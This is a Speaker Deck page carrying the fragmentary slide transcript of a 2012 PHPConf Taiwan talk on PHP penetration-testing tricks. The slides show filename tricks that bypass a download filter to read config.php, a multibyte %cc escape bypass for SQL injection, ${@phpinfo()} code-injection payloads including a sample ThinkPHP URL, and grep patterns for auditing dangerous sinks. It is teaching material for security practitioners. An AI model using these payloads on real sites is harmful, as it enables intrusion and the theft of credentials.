Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Security in PHP 那些在滲透測試的小技巧
Search
Orange
August 21, 2024
0
140
Security in PHP 那些在滲透測試的小技巧
PHPConf Taiwan 2012
Orange
August 21, 2024
Tweet
Share
More Decks by Orange
See All by Orange
Best Practices - The Upload
p8361
0
71
網頁安全 Web Security 入門
p8361
0
150
Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞
p8361
13
36k
那些 Web Hacking 中的奇技淫巧
p8361
16
14k
關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?
p8361
6
13k
PHPConf 2013 - 矛盾大對決
p8361
53
28k
0-Day 輕鬆談 - Happy Fuzzing Internet Explorer
p8361
15
12k
駭客看 Django
p8361
25
13k
Featured
See All Featured
jQuery: Nuts, Bolts and Bling
dougneiner
63
7.8k
Making the Leap to Tech Lead
cromwellryan
134
9.4k
KATA
mclloyd
30
14k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
18
990
Connecting the Dots Between Site Speed, User Experience & Your Business [WebExpo 2025]
tammyeverts
8
340
The Illustrated Children's Guide to Kubernetes
chrisshort
48
50k
Bootstrapping a Software Product
garrettdimon
PRO
307
110k
Speed Design
sergeychernyshev
32
1k
[RailsConf 2023] Rails as a piece of cake
palkan
55
5.7k
Put a Button on it: Removing Barriers to Going Fast.
kastner
60
3.9k
Practical Tips for Bootstrapping Information Extraction Pipelines
honnibal
PRO
21
1.3k
Building Flexible Design Systems
yeseniaperezcruz
328
39k
Transcript
2012/11/03 @ PHPCONF <
[email protected]
>
• aka Orange • 2009 • 2011 • 2011 AVTOKYO
• – – Web Security – Windows Vulnerability Exploitation
• CHROOT Security Group • NISRA • case. • Blog
– http://blog.orange.tw/
None
None
None
▪▪
None
<?php $url = $_GET['url']; echo urlencode( $url ); ?>
• Low – Sensitive Information Leakage… • Middle – Insecure
File Download/Access… • High – Local File Inclusion, Code Injection, SQL Inj…
None
• – – –
• showNews.php?id=198 – showNews.php?id=198/1 • checkName.php?u=lala – checkName.php?u=lala%cc' • getFile.php?path=hsu.doc
– getFile.php?path=./hsu.doc • main.php?module=index – main.php?module[]=index
None
None
1. Router, Controller URL Mapping 2. 3. 4. DB ORM
PHP orz
1. – system exec shell_exec popen eval create_function call_user_func preg_replace…
2. – _GET _POST _COOKIE _REQUEST _ENV _FILES _SERVER HTTP_RAW_POST_DATA php://input getenv …
• grep -Re – (include|require).+\$ – (eval|create_function|call_user_func|…).+\$ – (system|exec|shell_exec|passthru|…).+\$ –
(select|insert|update|where|…).+\$ – (file_get_contents|readfile|fopen|…).+\$ – (unserialize|parse_str|…).+\$ – \$\$, $a\(\) – ……
• grep -Re – \$(_GET|_POST|_COOKIE|_REQUEST|_FILES) – \$(_ENV|_SERVER) – getenv –
HTTP_RAW_POST_DATA – php://input – …
try { …… $trans->commit(); } catch (xxx_adapter_exception $e) { $trans->rollback();
require_once 'xxx_exceptio$n.class.php' throw new xxx_exception( …… ); }
None
None
<?php $name = $_GET['name']; $name = basename( $name ); if
( eregi( "(.php|.conf)$", $name ) ) exit( "Not Allow PHP." ); else readfile( DOCUMENT_ROOT. $name ); ?>
• down.php?name= – config.php – config"php – config.ph> – config.<
– c>>>>>"< – c<"< Test on PHP 5.4.8 newest stable version (2012/10/17) Original Will be replaced by < * > ? " .
None
• file_get_contents – > php_stream_open_wrapper_ex – > zend_resolve_path – >
php_resolve_path_for_zend – > php_resolve_path – > tsrm_realpath – > virtual_file_ex – > tsrm_realpath_r
None
• file_get_contents • file_put_contents • file • readfile • phar_file_get_contents
• include • include_once • require • require_once • fopen • opendir • readdir • mkdir • ……
None
• config.php/. • config.php///. • c>>>>>.</// Works on PHP 5.2.*
(2012/10/26)
None
• Web Browser PHP Output (HTML) – Cross-Site Scripting •
DB Management PHP Output (SQL) – SQL Injection
SELECT * FROM [table] WHERE username = 'PHPCONF'
SELECT * FROM [table] WHERE username = 'PHPCONF\''
SELECT * FROM [table] WHERE username = 'PHPCONF%cc\''
Σ( ° △ °|||)︴ Before After PHPCONF PHPCONF PHPCONF' PHPCONF\'
PHPCONF%80' PHPCONF�\' PHPCONF%cc' PHPCONF岤' 0x81-0xFE 0x40-0x7E 0xA1-0xFE
• addslashes • mysql_escape_string • magic_quote_gpc • Special Cases –
pdo – mysql_real_escape_st ring
None
• $url = "http://phpconf.tw/2012/"; • $url = "http://phpconf.tw/$year/"; • $url
= "http://phpconf.tw/{$year}/"; • $url = "http://phpconf.tw/{${phpinfo()}}/"; • $url = "http://phpconf.tw/${@phpinfo()}/";
config.php $dbuser = "root";
config.php $dbuser = "${@phpinfo()}";
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); https://orange.tw/index.php?s=module/action/ param1/${@phpinfo()}
Think PHP
None
– – – – – –
• PHP Security – http://blog.php-security.org/ • Oddities of PHP file
access in Windows®. – http://onsec.ru/onsec.whitepaper-02.eng.pdf
None
p8361
dougneiner
cromwellryan
mclloyd
sergeychernyshev
tammyeverts
chrisshort
garrettdimon
palkan
kastner
honnibal
yeseniaperezcruz
![2012/11/03 @ PHPCONF <[email protected]>](https://files.speakerdeck.com/presentations/0051be994ec64ef3be4ceccacef841bc/slide_0.jpg){kind=link}
![<?php $url = $_GET['url']; echo urlencode( $url ); ?>](https://files.speakerdeck.com/presentations/0051be994ec64ef3be4ceccacef841bc/slide_8.jpg){kind=link}
![<?php $name = $_GET['name']; $name = basename( $name ); if](https://files.speakerdeck.com/presentations/0051be994ec64ef3be4ceccacef841bc/slide_22.jpg){kind=link}
![SELECT * FROM [table] WHERE username = 'PHPCONF'](https://files.speakerdeck.com/presentations/0051be994ec64ef3be4ceccacef841bc/slide_32.jpg){kind=link}
![SELECT * FROM [table] WHERE username = 'PHPCONF\''](https://files.speakerdeck.com/presentations/0051be994ec64ef3be4ceccacef841bc/slide_33.jpg){kind=link}
![SELECT * FROM [table] WHERE username = 'PHPCONF%cc\''](https://files.speakerdeck.com/presentations/0051be994ec64ef3be4ceccacef841bc/slide_34.jpg){kind=link}
![$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); https://orange.tw/index.php?s=module/action/ param1/${@phpinfo()}](https://files.speakerdeck.com/presentations/0051be994ec64ef3be4ceccacef841bc/slide_41.jpg){kind=link}
